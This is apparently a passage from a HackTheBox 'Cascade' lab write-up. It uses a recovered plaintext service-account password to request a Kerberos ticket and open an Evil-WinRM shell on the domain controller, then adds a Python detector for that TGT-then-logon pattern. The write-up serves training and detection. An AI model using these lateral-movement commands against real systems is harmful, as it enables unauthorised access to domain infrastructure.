arksvc


The s.smith user had READ access to an SMB share that was serving a copy of a custom auditing program along with a DB file containing an encrypted credential. Later, I was able to recover and decrypt the encrypted password by reverse engineering the cryptographic method used in the program. Here, I will attempt to validate the credential before using it.

┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ impacket-gettgt cascade.local/arksvc:w3lc0meFr31nd -dc-ip $IP   
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Saving ticket in arksvc.ccache

Credential validated: the KDC issued a TGT for arksvc, so the recovered password is correct.

┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ evil-winrm -i casc-dc1.cascade.local -u arksvc -p w3lc0meFr31nd
 
Evil-WinRM shell v3.4
 
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
 
*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami
cascade\arksvc
*Evil-WinRM* PS C:\Users\arksvc\Documents> hostname
CASC-DC1
*Evil-WinRM* PS C:\Users\arksvc\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection 4:
 
   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::e8dc:7157:1983:a2bd
   Link-local IPv6 Address . . . . . : fe80::e8dc:7157:1983:a2bd%15
   IPv4 Address. . . . . . . . . . . : 10.10.10.182
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%15
                                       10.10.10.2
 
Tunnel adapter isatap.{603b363a-a965-4463-a4d0-a8850f844e1e}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Lateral movement to the arksvc user completed via WinRM.
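From the defender's side, the two steps above leave a recognisable trace on the DC: a Kerberos TGT request (Security event 4768) for a service account from an unfamiliar client address, followed within minutes by a network logon (4624, logon type 3) for the same account from the same address. The following is an added example, not code from the writeup, that correlates those two events over constructed JSON-exported log lines; the field names, the 10.10.14.5 source address and the timestamps are assumptions made up for the sample.

```python
"""Correlate a Kerberos TGT request (4768) with a following network logon
(4624, type 3) for the same account and source IP on a domain controller."""
import json
from datetime import datetime, timedelta

# Constructed sample events, one JSON object per line, in the shape a SIEM
# forwarder might emit for Security log entries. Not real log data.
SAMPLE_EVENTS = """
{"time":"2024-01-01T10:00:00","id":4768,"host":"CASC-DC1","user":"arksvc","ip":"10.10.14.5"}
{"time":"2024-01-01T10:00:30","id":4624,"host":"CASC-DC1","user":"arksvc","ip":"10.10.14.5","logon_type":3}
{"time":"2024-01-01T10:05:00","id":4768,"host":"CASC-DC1","user":"s.smith","ip":"10.10.10.50"}
{"time":"2024-01-01T11:00:00","id":4624,"host":"CASC-DC1","user":"s.smith","ip":"10.10.10.50","logon_type":3}
"""


def find_tgt_then_logon(lines, window=timedelta(minutes=10), known_hosts=frozenset()):
    """Return one hit per 4624/type-3 logon that follows a 4768 TGT request
    for the same (user, ip) within `window`, skipping IPs in `known_hosts`
    (an allowlist of admin jump hosts or other expected sources)."""
    events = [json.loads(l) for l in lines.strip().splitlines() if l.strip()]
    events.sort(key=lambda e: e["time"])  # correlate in time order
    last_tgt = {}  # (user, ip) -> time of the most recent 4768
    hits = []
    for e in events:
        t = datetime.fromisoformat(e["time"])
        key = (e["user"].lower(), e["ip"])
        if e["id"] == 4768:
            last_tgt[key] = t
        elif e["id"] == 4624 and e.get("logon_type") == 3:
            seen = last_tgt.get(key)
            if seen is None or t - seen > window or e["ip"] in known_hosts:
                continue
            hits.append({"user": e["user"], "ip": e["ip"], "host": e["host"],
                         "delta_s": int((t - seen).total_seconds())})
    return hits


if __name__ == "__main__":
    for hit in find_tgt_then_logon(SAMPLE_EVENTS):
        print(f"TGT then network logon: {hit['user']} from {hit['ip']} "
              f"on {hit['host']} after {hit['delta_s']}s")
```

The s.smith pair falls outside the 10-minute window and is not reported; tune the window and the allowlist to the environment, and treat a hit for a service account that should never log on interactively as a strong signal.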